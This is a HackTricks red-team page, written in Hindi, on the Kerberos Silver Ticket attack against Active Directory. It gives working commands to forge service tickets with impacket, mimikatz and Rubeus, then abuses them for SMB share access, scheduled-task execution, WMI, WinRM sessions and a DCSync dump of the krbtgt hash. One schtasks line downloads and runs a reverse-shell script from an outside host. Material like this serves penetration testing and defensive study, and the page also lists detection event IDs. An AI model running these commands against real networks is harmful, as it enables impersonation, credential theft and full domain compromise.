HackTricksSilver Ticket
Reading time: 6 minutes
tip
AWS हैकिंग सीखें और अभ्यास करें:
HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: 
HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
Silver ticket
Silver Ticket हमला Active Directory (AD) वातावरण में सेवा टिकटों के शोषण से संबंधित है। यह विधि सेवा खाते का NTLM हैश प्राप्त करने पर निर्भर करती है, जैसे कि एक कंप्यूटर खाता, ताकि एक टिकट ग्रांटिंग सेवा (TGS) टिकट को जाली बनाया जा सके। इस जाली टिकट के साथ, एक हमलावर नेटवर्क पर विशिष्ट सेवाओं तक पहुँच सकता है, किसी भी उपयोगकर्ता का अनुकरण करते हुए, आमतौर पर प्रशासनिक विशेषाधिकारों के लिए लक्ष्य बनाते हुए। यह जोर दिया गया है कि टिकटों को जाली बनाने के लिए AES कुंजियों का उपयोग करना अधिक सुरक्षित और कम पहचानने योग्य है।
टिकट बनाने के लिए, विभिन्न उपकरणों का उपयोग ऑपरेटिंग सिस्टम के आधार पर किया जाता है:
On Linux
python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass
विंडोज़ पर
# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"
# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>
# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd
CIFS सेवा को पीड़ित की फ़ाइल प्रणाली तक पहुँचने के लिए एक सामान्य लक्ष्य के रूप में उजागर किया गया है, लेकिन HOST और RPCSS जैसी अन्य सेवाओं का भी कार्यों और WMI प्रश्नों के लिए शोषण किया जा सकता है।
उपलब्ध सेवाएँ
| सेवा प्रकार | सेवा सिल्वर टिकट्स |
|---|---|
| WMI | HOST RPCSS |
| PowerShell रिमोटिंग | HOST HTTP OS के आधार पर भी: WSMAN RPCSS |
| WinRM | HOST HTTP कुछ अवसरों पर आप बस पूछ सकते हैं: WINRM |
| अनुसूचित कार्य | HOST |
| Windows फ़ाइल शेयर, साथ ही psexec | CIFS |
| LDAP संचालन, जिसमें DCSync शामिल है | LDAP |
| Windows रिमोट सर्वर प्रशासन उपकरण | RPCSS LDAP CIFS |
| गोल्डन टिकट्स | krbtgt |
Rubeus का उपयोग करके आप सभी इन टिकटों के लिए निम्नलिखित पैरामीटर का उपयोग कर सकते हैं:
/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm
सिल्वर टिकट्स इवेंट आईडी
- 4624: खाता लॉगिन
- 4634: खाता लॉगआउट
- 4672: व्यवस्थापक लॉगिन
सेवा टिकट्स का दुरुपयोग
निम्नलिखित उदाहरणों में कल्पना करें कि टिकट को व्यवस्थापक खाते का अनुकरण करते हुए पुनः प्राप्त किया गया है।
CIFS
इस टिकट के साथ आप SMB के माध्यम से C$ और ADMIN$ फ़ोल्डर तक पहुँच प्राप्त कर सकेंगे (यदि वे उजागर हैं) और फ़ाइलों को दूरस्थ फ़ाइल प्रणाली के एक भाग में कॉपी कर सकेंगे, बस कुछ ऐसा करके:
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp
आप होस्ट के अंदर एक शेल प्राप्त करने या psexec का उपयोग करके मनमाने आदेश निष्पादित करने में भी सक्षम होंगे:
HOST
इस अनुमति के साथ, आप दूरस्थ कंप्यूटरों में अनुसूचित कार्य उत्पन्न कर सकते हैं और मनमाने आदेश निष्पादित कर सकते हैं:
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
HOST + RPCSS
इन टिकटों के साथ आप पीड़ित प्रणाली में WMI निष्पादित कर सकते हैं:
#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"
#You can also use wmic
wmic remote.computer.local list full /format:list
wmiexec के बारे में अधिक जानकारी निम्नलिखित पृष्ठ पर खोजें:
HOST + WSMAN (WINRM)
winrm एक्सेस के साथ एक कंप्यूटर पर आप इसका उपयोग कर सकते हैं और यहां तक कि एक PowerShell प्राप्त कर सकते हैं:
New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
इस पृष्ठ को देखें ताकि आप winrm का उपयोग करके एक दूरस्थ होस्ट से कनेक्ट करने के अधिक तरीके जान सकें:
warning
ध्यान दें कि winrm को दूरस्थ कंप्यूटर पर सक्रिय और सुनने वाला होना चाहिए ताकि आप इसे एक्सेस कर सकें।
LDAP
इस विशेषाधिकार के साथ आप DCSync का उपयोग करके DC डेटाबेस को डंप कर सकते हैं:
mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
DCSync के बारे में अधिक जानें निम्नलिखित पृष्ठ पर:
संदर्भ
- https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
- https://www.tarlogic.com/blog/how-to-attack-kerberos/
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।